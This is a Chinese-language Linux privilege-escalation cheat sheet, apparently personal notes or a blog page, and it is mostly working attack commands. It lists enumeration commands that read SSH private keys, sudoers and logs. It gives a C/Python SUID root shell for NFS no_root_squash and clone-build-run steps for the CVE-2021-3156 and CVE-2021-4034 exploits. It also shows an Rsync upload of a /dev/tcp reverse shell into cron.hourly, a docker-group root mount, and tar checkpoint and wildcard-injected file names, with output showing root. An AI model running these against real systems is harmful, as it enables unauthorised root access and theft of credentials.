权限提升-Linux
命令
内核,操作系统,设备信息
uname -a 打印所有可用的系统信息
uname -r 内核版本
uname -n 系统主机名。
uname -m 查看系统内核架构(64位/32位)
hostname 系统主机名
cat /proc/version 内核信息
cat /etc/*-release 分发信息
cat /etc/issue 分发信息
cat /proc/cpuinfo CPU信息
cat /etc/lsb-release # Debian
cat /etc/redhat-release # Redhat
ls /boot | grep vmlinuz-用户权限信息
whoami 当前用户名
id 当前用户信息
cat /etc/sudoers 谁被允许以root身份执行
sudo -l 当前用户可以以root身份执行操作环境信息
env 显示环境变量
set 现实环境变量
echo %PATH 路径信息
history 显示当前用户的历史命令记录
pwd 输出工作目录
cat /etc/profile 显示默认系统变量
cat /etc/shells 显示可用的shellrc
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout进程和服务
ps aux
ps -ef
top
cat /etc/services查看安装的软件
ls -alh /usr/bin/
ls -alh /sbin/
ls -alh /var/cache/yum/
dpkg -l服务和插件
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/计划任务
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root是否有存放明文密码
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find , -name "*.php" -print0 | xargs -0 grep -i -n "var $password"ssh私钥信息
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key查看与主机通信的信息
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -anptl
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w日志信息
cat /var/log/boot.log
cat /var/log/cron
cat /var/log/syslog
cat /var/log/wtmp
cat /var/run/utmp
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp查看可提权的SUID或GUID
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null查看可写/执行目录
find / -writable -type d 2>/dev/null # world-writeable folders
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o w -type d 2>/dev/null # world-writeable folders
find / -perm -o x -type d 2>/dev/null # world-executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folderssuid&guid
原因:
chmod u+s赋予了suid- 被赋予suid的工具可以执行命令或者其他危害
nfs
网络文件系统(NFS)是一个客户端 / 服务器应用程序,它使计算机用户可以查看和选择存储和更新远程计算机上的文件,就像它们位于用户自己的计算机上一样。在 NFS 协议是几个分布式文件系统标准,网络附加存储(NAS)之一。
NFS 是基于 UDP/IP 协议的应用,其实现主要是采用远程过程调用 RPC 机制,RPC 提供了一组与机器、操作系统以及低层传送协议无关的存取远程文件的操作。RPC 采用了 XDR 的支持。XDR 是一种与机器无关的数据描述编码的协议,他以独立与任意机器体系结构的格式对网上传送的数据进行编码和解码,支持在异构系统之间数据的传送。
利用先遣条件:no_root_squash选项得开启
-
识别nfs共享,可以利用nmap工具或rpcinfo等工具
nmap -sV -p111,2049 IP #nmap扫描nfs的常用端口111和2049 rpcinfo -p 192.168.1.171 #rpcinfo直接枚举nfs -
-
检查nfs配置文件
/etc/exports,检查开启的nsf共享目录和no_root_squash选项设置 -
利用metasploit或showmount列举目标主机的可用nfs exports
msf > use auxiliary/scanner/nfs/nfsmount msf auxiliary(nfsmount) > set rhosts IP msf auxiliary(nfsmount) > runshowmount -e IP
-
-
挂载nfs exports
sudo mount -o [options] -t nfs ip_address:share directory_to_mount -
编写脚本,写入想执行的命令。可以是
/bin/bash或C语言等脚本例子:
-
C语言脚本
#include<unistd.h> void main() { setuid(0); setgid(0); system("/bin/bash"); } -
python脚本
/usr/bin/python3 import os import sys try: os.system("/bin/bash") except: sys.exit()
-
-
chmod +s 文件添加suid权限
sudo
cve
介绍:
sudo被披露存在一个基于堆的缓冲区溢出漏洞(CVE-2021-3156),可导致本地权限提升。
当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论是否在sudoers文件中)获得root权限,无需进行身份验证,且攻击者不需要知道用户密码。
影响版本:目前可验证此漏洞的linux环境只有-Ubuntu、Debian。
sudo: 1.8.2 - 1.8.31p2
sudo: 1.9.0 - 1.9.5p1
利用脚本:https://github.com/blasty/CVE-2021-3156
前提条件:已获取本地用户权限
1.执行命令判断是否存在漏洞
命令:sudo –version #查看sudo版本
命令:sudoedit -s / #执行报错则存在漏洞
2.如果版本符合漏洞产生条件,就可以克隆漏洞利用项目。
命令:git clone https://github.com/blasty/CVE-2021-3156.git
命令:cd CVE-2021-3156 #进入项目
命令:make #编译项目
命令:chmod a+x sudo-hax-me-a-sandwich #赋予脚本执行权限
3.命令:./sudo-hax-me-a-sandwich #执行脚本,获取脚本模块编号和利用方法
命令:uname -a #查看本机系统版本信息
命令:./sudo-hax-me-a-sandwich 2 #执行脚本,指定对应系统信息的模块编号
执行成功后即可获取root权限。
环境变量
管理员编译了程序,给予了程序管理员运行的权限
攻击通过对程序的运行 调试 反编译等得到了程序的运行大概逻辑
尝试对程序调用的环境变量进行复制后覆盖,导致程序的加载继承权限
例如某个c文件调用系统命令ps,管理员编译后给予了suid,我们就可以自创一个和原来要调用的ps可执行文件同名的文件传上去,然后把传进去的这个目录添加到环境变量,相当于完成了环境变量的覆盖
配置不当
Rsync未授权访问覆盖
介绍:Rsync是linux下一款数据备份工具,默认开启873端口。如果用户未配置账号密码就会造成未授权访问。
前提条件:目标存在Rsync 未授权访问漏洞
测试命令:rsync rsync://ip:port
提权:借助Linux默认计划任务调用/etc/cron.hourly,利用rsync连接上传反弹shell
可以执行命令下载任意文件
命令:rsync -av rsync://ip:873/src/etc/passwd ./
/etc/cron.hourly是一个定时执行的计划任务,每小时的第17分钟执行一次cron.hourly。可以执行如下命令查看
命令:rsync -av rsync://ip:873/src/etc/crontab ./crontab.txt
写一个含有反弹shell命令的文件
shell:
/bin/bash -i >& /dev/tcp/监听ip/端口 0>&1
chmod +x shell
将shell文件上传到/etc/cron.hourly(尝试覆盖) :
命令:rsync -av shell rsync://目标ip/src/etc/cron.hourly
设置监听,等到一个小时的17分钟时,成功获取shell
命令:nc -nvv -lp 8888docker组挂载
docker组的本质就是无密码root身份访问主机文件
利用命令
docker run -v /root:/mnt -it ubuntu可以创建一个新的docker实例,以主机的/root目录作为系统卷启动。容器启动后可以查看该目录内容或添加ssh密钥,更改为其他目录均可,可以结合/etc/shadow破解或添加sudoers等。
介绍:利用docker服务启动镜像挂载目录,从而来访问root目录、etc目录等敏感文件来进行权限提升。
前提条件:已获取本地普通用户权限,且普通用户在docker组中。
-
创建用户归类目录,添加到docker组
useradd -d /home/test -m test #创建test用户 passwd test #设置密码 usermod -G docker test #将test用户添加到docker组 newgrp docker #更新docker用户组
-
提权
docker run -v /root:/mnt -it alpine 解释:从Docker上面下载alpine镜像,然后运行; -v将容器外部的目录/root挂载到容器内部/mnt目录,使用-it参数进入容器shell。 命令执行完成,成功提权
polkit
漏洞影响2009年5月至今的所有polkit版本。
由于polkit是系统预装工具,所有存在polkit的linux系统均受影响。如:CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等
1.执行命令,判断是否安装了polkit
命令:dpkg -l policykit-1 #有正常回显说明安装了
2.执行命令,将漏洞利用项目克隆到目标目录
命令:git clone GitHub - berdav/CVE-2021-4034: CVE-2021-4034 1day
3.执行脚本,开始提权
命令:cd CVE-2021-4034/ #进入项目目录
命令:make #编译项目
命令:./cve-2021-4034 #执行脚本,开始自动提权
通配符提权(技术比较老)
这里介绍tar checkpoint,类似的通配符还有chown和rsync
如果管理员给予了某个普通用户tar命令的超级管理员操作
当以root权限运行tar时,有多种可能性可以进行提权。
sudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action=exec="/bin/bash"
-c:创建新的档案文件,相当于打包(-x,相反的操作,拆包)
-f:使用档名,f之后直接加档名,中间不能加其他参数
--checkpoint=n:每写入n个记录之后设置一个检查点,在检查点可以执行任意的操作,操作由--checkpoint-action指定
exec:执行外部命令示例1
用户可以通过sudo运行tar,且没有任何命令行参数限制
test@b66231ae0dc1:~$ sudo -l
User test may run the following commands on b66231ae0dc1:
(ALL) NOPASSWD: /usr/bin/tar
test@b66231ae0dc1:~$运行以下命令可以提权
test@b66231ae0dc1:~$ id
uid=1000(test) gid=1000(test) groups=1000(test)
test@b66231ae0dc1:~$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
# id
uid=0(root) gid=0(root) groups=0(root)
#示例2
用户可以通过sudo运行tar,且命令行参数包含匹配符(’*’) ps:常见于定时任务
test@b66231ae0dc1:~$ sudo -l
Matching Defaults entries for test on b66231ae0dc1:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User test may run the following commands on b66231ae0dc1:
(ALL) NOPASSWD: /usr/bin/tar cvvf backup.tar *
test@b66231ae0dc1:~$通过以下步骤提权
首先创建shell.sh文件,运行该脚本会将SUID权限赋予/usr/bin/bash。
test@b66231ae0dc1:~$ echo "chmod u+s /usr/bin/bash" > shell.sh然后创建两个空文件,文件名分别为--checkpoint-action=exec=sh shell.sh和--checkpoint=1
test@b66231ae0dc1:~$ echo "" > "--checkpoint-action=exec=sh shell.sh"
test@b66231ae0dc1:~$ echo "" > "--checkpoint=1"
test@b66231ae0dc1:~$ ls -alrt
-rw-rw-r--. 1 test test 24 Sep 8 05:06 shell.sh
-rw-rw-r--. 1 test test 1 Sep 8 05:06 '--checkpoint-action=exec=sh shell.sh'
drwxr-x---. 1 test test 123 Sep 8 05:06 .
-rw-rw-r--. 1 test test 1 Sep 8 05:06 '--checkpoint=1'
通过`sudo`运行`tar`
这里通配符相当于匹配了我们写的那两个文件名从而拼接了tar命令
test@b66231ae0dc1:~$ sudo tar cvvf backup.tar *
-rw-rw-r-- test/test 24 2022-09-08 05:06 shell.sh运行完成后,可以看到/usr/bin/bash有了SUID
None复制代码test@b66231ae0dc1:~$ ls -alrt /usr/bin/bash
-rwsr-xr-x. 1 root root 1396520 Jan 6 2022 /usr/bin/bash最后使用bash提权(bash -p)
test@b66231ae0dc1:~$ id
uid=1000(test) gid=1000(test) groups=1000(test)
test@b66231ae0dc1:~$ bash -p
bash-5.1# id
uid=1000(test) gid=1000(test) euid=0(root) groups=1000(test)